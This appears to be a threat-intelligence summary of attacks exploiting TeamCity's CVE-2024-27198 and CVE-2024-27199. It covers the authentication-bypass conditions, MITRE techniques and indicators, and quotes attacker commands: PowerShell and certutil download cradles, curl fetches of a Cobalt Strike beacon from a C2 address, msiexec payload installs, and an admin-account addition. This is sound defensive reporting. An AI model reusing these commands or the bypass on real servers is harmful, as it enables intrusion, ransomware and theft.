Keypoints
- CVE-2024-27198 is a critical authentication bypass (RCE) in TeamCity’s web component; CVE-2024-27199 is a directory traversal leading to authentication bypass and information leakage.
- Exploitation conditions for CVE-2024-27198 include generating an unauthenticated 404 response, using the query string “?jsp=/app/rest/server”, and appending “;.jsp” to the path parameter.
- Directory traversal via CVE-2024-27199 affects paths such as /res/, /update/, and /.well-known/acme-challenge/.
- Observed post-exploitation activity includes MSI downloads via msiexec to drop payloads: Jasmin ransomware (renames files to .lsoc), XMRig miner (JavaAccessBridge-64.exe + WinRing0x64.sys + config.json), and SparkRAT via certutil and bat scripts.
- Attackers used multistage chains leveraging living-off-the-land binaries (msiexec, certutil, curl, powershell) to retrieve and execute payloads and to create persistence (sc create) and manipulate accounts (net/net1 commands).
- Cobalt Strike beacons were also delivered (downloaded with curl and saved to C:TeamCity*.conf), contacting known C2 servers observed in telemetry.
- Trend detections and rules (TippingPoint, Trend Vision One, DDI) were published to identify exploit responses and malicious payload activity.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Used to gain initial access to TeamCity by bypassing authentication via CVE-2024-27198/CVE-2024-27199 (‘allow attackers to bypass authentication measures and gain administrative control over affected servers.’)
- [T1059.001] PowerShell – Employed to download and execute payloads on compromised servers (‘powershell -ep bypass IEX (New-Object System.Net.Webclient).DownloadFile(…)’).
- [T1140] De-obfuscate/Decode Files or Information – Used by attackers to obfuscate ransom note and decode components (ransom note ‘obfuscated and used JavaScript to generate the ransom note text’).
- [T1087] Account Discovery – Attackers ran account enumeration commands from the TeamCity process (‘C:WINDOWSsystem32net.exe group /domain’).
- [T1482] Domain Trust Discovery – Used nltest to enumerate domain trusts during discovery (‘C:WINDOWSsystem32nltest.exe /domain_trusts’).
- [T1105] Ingress Tool Transfer – MSI and other payloads were fetched via HTTP (msiexec used to install hxxp://…/ABC.msi and similar URLs).
- [T1041] Exfiltration Over C2 Channel – Malicious beacons reached out to C2 servers to receive commands (‘The beacon reaches out to the C&C server 83[.]97[.]20[.]141’).
- [T1486] Data Encrypted for Impact – Ransomware encrypted files and renamed them with the .lsoc extension and dropped a ransom note (‘rename files with the extension .lsoc and drop a ransom note’).
Indicators of Compromise
- [IP addresses] Payload/C2 hosts observed – 207[.]246[.]102[.]242:56641 (MSI host), 146[.]70[.]149[.]185:58090 (miner MSI), and other C2s such as 38[.]54[.]94[.]13 and 83[.]97[.]20[.]141.
- [File hashes] Observed payload hashes – SHA256: 56942b36d5990f66a81955a94511298fd27cb6092e467110a7995a0654f17b1a (ABC.msi), SHA256: 32a630decb8fcc8a7ed4811f4293b9d5a242ce7865ab10c19a16fc4aa384bf64 (dropped PE), and 3 more hashes.
- [File names] Dropped binaries and artifacts – JavaAccessBridge-64.exe, WinRing0x64.sys (miner driver), un-lock your files.html (ransom note).
- [URLs/Download paths] Example download endpoints – hxxp://207[.]246[.]102[.]242:56641/ABC.msi, hxxp://146[.]70[.]149[.]185:58090/JavaAccessBridge-64.msi, hxxp://38[.]54[.]94[.]13:8080/86.dat.
- [C2 servers] Command servers linked to payloads – 38[.]54[.]94[.]13 (SparkRAT), 83[.]97[.]20[.]141 (Cobeacon/Cobalt Strike beacon).
To exploit CVE-2024-27198 attackers trigger an unauthenticated 404 response, append the query string ?jsp=/app/rest/server and append “;.jsp” to the path parameter to bypass TeamCity web authentication, enabling remote code execution. CVE-2024-27199 allows directory traversal (affecting paths like /res/, /update/, and /.well-known/acme-challenge/) that can leak information and help bypass authentication. Exploitation chains observed in telemetry use TeamCity’s java.exe to spawn cmd.exe and run msiexec to fetch MSI installers (e.g., ABC.msi or JavaAccessBridge-64.msi) which drop and execute payloads.
Post-exploitation follows a multistage, LOLBin-heavy workflow: msiexec downloads MSI packages that unpack payloads (ransomware PE or XMRig binaries plus components such as config.json and WinRing0x64.sys); certutil is used to decode or retrieve binaries (certutil -urlcache -split -f …); PowerShell with -ep bypass or direct cmd invocations execute bat scripts that create services (sc create windowDefenSrv …) and establish persistence. SparkRAT was installed via a win.bat that uses certutil to fetch public.dat and starts it, while XMRig uses the dropped WinRing0x64.sys driver to access MSRs for mining when required.
Attackers also run discovery and privilege escalation commands from the compromised TeamCity process (examples: net group /domain, net1 localgroup Administrators /add Default$, nltest /domain_trusts) and fetch remote beacons via curl (e.g., curl hxxp://83[.]97[.]20[.]141:81/beacon.out -o .conf) to deploy Cobalt Strike beacons. Defenders should watch for msiexec, certutil, suspicious msf/curl downloads, .lsoc file renames, and creation of unexpected services and scheduled items under TeamCity process ancestry.